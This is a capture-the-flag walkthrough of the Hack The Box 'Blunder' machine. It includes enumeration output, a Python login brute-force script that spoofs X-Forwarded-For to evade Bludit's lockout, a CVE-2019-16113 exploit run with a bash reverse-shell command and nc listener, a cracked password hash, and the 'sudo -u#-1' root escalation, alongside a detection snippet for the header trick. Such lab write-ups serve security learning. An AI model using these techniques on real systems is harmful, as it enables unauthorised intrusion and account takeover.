Blunder is a Linux box. Let's start with an nmap scan and some enumeration.


Nmap scan report for
Host is up (0.32s latency).
Not shown: 998 filtered ports
21/tcp closed ftp
80/tcp open   http?
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: OPTIONS
|_http-title: Blunder | A blunder of interesting facts


python3 -u -e *
[11:44:57] Starting
[11:45:01] 200 -    7KB - /%3f/
[11:45:10] 200 -  563B  - /.gitignore
[11:45:30] 200 -    7KB - /0
[11:45:56] 200 -    3KB - /about
[11:46:04] 301 -    0B  - /admin  ->
[11:46:08] 200 -    2KB - /admin/
[11:46:08] 200 -    2KB - /admin/.config


wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u ""
* Wfuzz 2.4.5 - The Web Fuzzer                         *
Total requests: 4658
ID           Response   Lines    Word     Chars     Payload
000003519:   200        1 L      4 W      22 Ch     "robots"
000004125:   200        4 L      23 W     118 Ch    "todo"

Dig into todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

The todo list gives us the username fergus for the admin panel and hints that the CMS is Bludit. Simple password guessing didn't work, so the usual approach is to build a wordlist from the site with cewl and brute-force the login.


cewl -w passwords.txt -d 10 -m 1

I tried different brute-force tools, but they didn't work because of Bludit's brute-force mitigation, so I used the following script instead.

#!/usr/bin/env python3
from __future__ import print_function
import re
import requests

def open_ressources(file_path):
    return [item.replace("\n", "") for item in open(file_path).readlines()]

host = ''  # target base URL, omitted on the page
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/home/kali/passwords.txt')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    # the login form carries a CSRF token that has to be sent back with each attempt
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
    print('[*] Trying: {p}'.format(p = password))
    headers = {'X-Forwarded-For': password,
               'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
               'Referer': login_url}
    data = {'tokenCSRF': csrf_token, 'username': username, 'password': password, 'save': ''}
    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
    # a successful login answers with a redirect to the dashboard
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
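The script above sends a different X-Forwarded-For value with every attempt, which is what gets it past the per-client lockout; on the defending side that behaviour is easy to spot in web-server logs. The following check is an added example, not part of the original write-up: it parses constructed access-log lines (format assumed: client IP, quoted X-Forwarded-For value, request line, status) and flags any client whose login POSTs carry several distinct, non-IP header values.

```python
import ipaddress
import re
from collections import defaultdict

# Assumed log format: client IP, X-Forwarded-For header in quotes, request line, status.
LINE_RE = re.compile(
    r'^(?P<client>\S+) "(?P<xff>[^"]*)" "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample: 10.0.0.5 sends a different header value on every login POST (the
# bypass script puts each password guess there); 10.0.0.9 is a normal user behind a proxy.
SAMPLE_LOG = [
    '10.0.0.5 "{}" "POST /admin/login HTTP/1.1" 200'.format(guess)
    for guess in ("facts", "blunder", "Blunder", "fergus", "interesting", "blog")
] + [
    '10.0.0.9 "203.0.113.7" "GET /admin/login HTTP/1.1" 200',
    '10.0.0.9 "203.0.113.7" "POST /admin/login HTTP/1.1" 302',
    '10.0.0.9 "203.0.113.7" "GET /admin/dashboard HTTP/1.1" 200',
]

def parse_line(line):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def is_ip(value):
    """True if the first hop of an X-Forwarded-For chain parses as an IP address."""
    try:
        ipaddress.ip_address(value.split(",")[0].strip())
        return True
    except ValueError:
        return False

def detect_xff_rotation(lines, path="/admin/login", threshold=3):
    """Return {client: {...}} for clients whose POSTs to path carry >= threshold distinct XFF values."""
    # Non-IP values are counted separately: a genuine proxy chain never produces those.
    xff_by_client = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path:
            xff_by_client[rec["client"]].add(rec["xff"])
    return {
        client: {"distinct_xff": len(values),
                 "non_ip_xff": sum(1 for v in values if not is_ip(v))}
        for client, values in xff_by_client.items() if len(values) >= threshold
    }

if __name__ == "__main__":
    for client, info in detect_xff_rotation(SAMPLE_LOG).items():
        print("[!] {}: {distinct_xff} distinct X-Forwarded-For values on login POSTs, "
              "{non_ip_xff} of them not IPs".format(client, **info))
```

In production the same counter keyed on the real client address (or on the per-user account) is what the lockout itself should use, rather than a header the client controls.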

This gives fergus:RolandDeschain, which logs in to the Bludit CMS. Searching for Bludit CVEs turns up CVE-2019-16113; there is a Python exploit for it, and you can also go with the Metasploit framework.

I used the exploit from GitHub.

python3 -u -user fergus -pass RolandDeschain -c "bash -c 'bash -i >& /dev/tcp/ 0>&1'"

Listen on the chosen port, in this case 1337:

nc -lvp 1337

After getting the reverse shell, dig into the files under /var/www/bludit-3.10.0a/bl-content/databases/; that directory contains a users.php file.

It contains a password hash. Identifying it shows SHA1, and cracking it online gives:

faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120


[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: Password120
cat user.txt

Now for root. Running sudo -l shows the entry (ALL, !root) /bin/bash.

A quick Google search for (ALL, !root) /bin/bash turns up the following:


$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
[email protected]:/root# cat root.txt
cat root.txt

Hope you Enjoy it 😀

